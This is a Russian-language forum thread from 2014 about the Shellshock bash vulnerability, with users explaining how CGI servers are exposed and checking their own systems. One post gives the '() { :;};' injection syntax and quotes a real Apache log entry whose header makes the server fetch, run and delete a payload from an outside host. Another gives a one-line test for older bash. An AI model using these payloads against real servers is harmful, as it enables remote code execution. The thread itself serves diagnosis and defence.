ShellShock vulnerability (!)
-
- ефрейтор
- Сообщения: 63
- Зарегистрирован: 2010-10-09 21:51:17
- Откуда: Из тех ворот откуда весь народ
ShellShock vulnerability (!)
На выходные "подарунчик" ловите, похлеще "кровавого сердца" будет мля
Багу в Bash-е расщекотили которая два десятка лет спала
Web серваки работающиие через CGI под прицелом номер один: так что- "хороших выходных"
http://web.nvd.nist.gov/view/vuln/detai ... -2014-6271
http://web.nvd.nist.gov/view/vuln/detai ... -2014-7169
Багу в Bash-е расщекотили которая два десятка лет спала
Web серваки работающиие через CGI под прицелом номер один: так что- "хороших выходных"
http://web.nvd.nist.gov/view/vuln/detai ... -2014-6271
http://web.nvd.nist.gov/view/vuln/detai ... -2014-7169
I also known as: "Нефиг_чем_заняться"
Услуги хостинговой компании Host-Food.ru
Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/
- Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
- Контактная информация:
Re: ShellShock vulnerability (!)
не юзаю баш
и другим не советую.
есть tcsh, он всё может.
есть sh - на нём скрпиты пишутся.
всё остальное - ф топку
и другим не советую.
есть tcsh, он всё может.
есть sh - на нём скрпиты пишутся.
всё остальное - ф топку
Убей их всех! Бог потом рассортирует...
-
- ефрейтор
- Сообщения: 63
- Зарегистрирован: 2010-10-09 21:51:17
- Откуда: Из тех ворот откуда весь народ
Re: ShellShock vulnerability (!)
Согласен на все 100%, но к сожалению половине интернета глубоко срать на наши советы, да и БЗДевые поделки типа Apple тоже по дефолту юзают башатину, а любителей "самого крутого" с распальцованными пальчиками очень даже предостаточно
I also known as: "Нефиг_чем_заняться"
-
- ст. лейтенант
- Сообщения: 1375
- Зарегистрирован: 2010-02-05 0:21:40
Re: ShellShock vulnerability (!)
Я себя чувствую последним ламером, но никак не могу понять как этой багой пользоваться.
Допустем у меня есть сервер со старым непропатченым башем. И допустим, что у меня есть веб-сервер на той самой машине. И даже допустим, что там часть скриптов cgi. И что? Как удаленный хакер должен объявить переменные для баша, чтоб они потом исполнились?
Допустем у меня есть сервер со старым непропатченым башем. И допустим, что у меня есть веб-сервер на той самой машине. И даже допустим, что там часть скриптов cgi. И что? Как удаленный хакер должен объявить переменные для баша, чтоб они потом исполнились?
-
- ефрейтор
- Сообщения: 63
- Зарегистрирован: 2010-10-09 21:51:17
- Откуда: Из тех ворот откуда весь народ
Re: ShellShock vulnerability (!)
CGI скрипты запускаются из под дефолтового шела.FiL писал(а): И даже допустим, что там часть скриптов cgi. И что?
Баш имеет такую фичу как подхватывать из enviroment функции.
Некорректный парсинг функций из ENV приводит к тому, что выполняется следующая команда после баго фунции, как ниже
Код: Выделить всё
() { :;}; здесь любая легитимная шелл команда
Послав простой HTTP запрос с левым HTTP header-ом, запрос напрямую сбрасывется в среду, которая подхватывается башем и .... бум - ВЫПОЛНЯЕТСЯ
Делаю прям сейчас на боевом серваке :Как удаленный хакер должен объявить переменные для баша, чтоб они потом исполнились?
Код: Выделить всё
egrep '\{\s*\:' /var/log/apache2/*.log
Код: Выделить всё
access.log:xx.xx.xx.xx - - [29/Sep/2014:02:34:12 -0500] "GET / HTTP/1.0" 403 199 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z IP.of.govno.servera/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
На BSD-вых машинах где дефолтоый шелл - допотопный баш 3 (разговор о чудо "крутых" машинах от компании по производству чудо яблок)
баш провоцируется чуток по другому:
Код: Выделить всё
env X='() { (a)=>\' /bin/bash -c "echo date"; cat echo
I also known as: "Нефиг_чем_заняться"
- Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
- Контактная информация:
Re: ShellShock vulnerability (!)
Код: Выделить всё
[root@vds01 ~]# cd /tmp/
[root@vds01 tmp]# wget --no-check-certificate https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck
--2014-09-30 11:01:24-- https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com|185.31.17.133|:443... connected.
WARNING: certificate common name `www.github.com' doesn't match requested host name `raw.githubusercontent.com'.
HTTP request sent, awaiting response... 200 OK
Length: 1375 (1.3K) [text/plain]
Saving to: `bashcheck'
100%[===============================================>] 1,375 --.-K/s in 0s
2014-09-30 11:01:25 (15.2 MB/s) - `bashcheck' saved [1375/1375]
[root@vds01 tmp]# chmod +x bashcheck
[root@vds01 tmp]# ./bashcheck
Not vulnerable to CVE-2014-6271 (original shellshock)
Not vulnerable to CVE-2014-7169 (taviso bug)
Not vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer
Variable function parser inactive, likely safe from unknown parser bugs
[root@vds01 tmp]#
Убей их всех! Бог потом рассортирует...
-
- ст. лейтенант
- Сообщения: 1375
- Зарегистрирован: 2010-02-05 0:21:40
Re: ShellShock vulnerability (!)
Спасибо за объяснение. Про переменные среды, посылаемые через http header я не подумал (не знал?).BSD_daemon писал(а): Послав простой HTTP запрос с левым HTTP header-ом, запрос напрямую сбрасывется в среду, которая подхватывается башем и .... бум - ВЫПОЛНЯЕТСЯ
Последний раз редактировалось FiL 2014-09-30 16:03:54, всего редактировалось 1 раз.
- Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
- Контактная информация:
Re: ShellShock vulnerability (!)
я, кстати, тоже не знал.
тока это не проблема вебсервера, это проблема баша, цепляющего при обработке cgi скрипта весь мусор в переменные
тока это не проблема вебсервера, это проблема баша, цепляющего при обработке cgi скрипта весь мусор в переменные
Убей их всех! Бог потом рассортирует...
-
- ст. лейтенант
- Сообщения: 1375
- Зарегистрирован: 2010-02-05 0:21:40
Re: ShellShock vulnerability (!)
Подумав (это вообще занятие мне не свойственно), понял, что других способов общения клиента со скриптом просто быть не может. Таки веб сервер тут не виноват. Жизнь у него такая. Как страшно жить (с)
- Alex Keda
- стреляли...
- Сообщения: 35465
- Зарегистрирован: 2004-10-18 14:25:19
- Откуда: Made in USSR
- Контактная информация:
Re: ShellShock vulnerability (!)
ну, поправят...
главное вовремя обновицца )
главное вовремя обновицца )
Убей их всех! Бог потом рассортирует...
- dekloper
- ст. лейтенант
- Сообщения: 1331
- Зарегистрирован: 2008-02-24 15:43:19
- Откуда: давно здесь сидим..
- Контактная информация:
Re: ShellShock vulnerability (!)
и срать на нихBSD_daemon писал(а):Согласен на все 100%, но к сожалению половине интернета глубоко срать на наши советы, да и БЗДевые поделки типа Apple тоже по дефолту юзают башатину, а любителей "самого крутого" с распальцованными пальчиками очень даже предостаточно
ТОВАгИЩИ! БгАТЬЯ И СЕСТгЫ! ДОЛОЙ гАВНОДУШИЕ!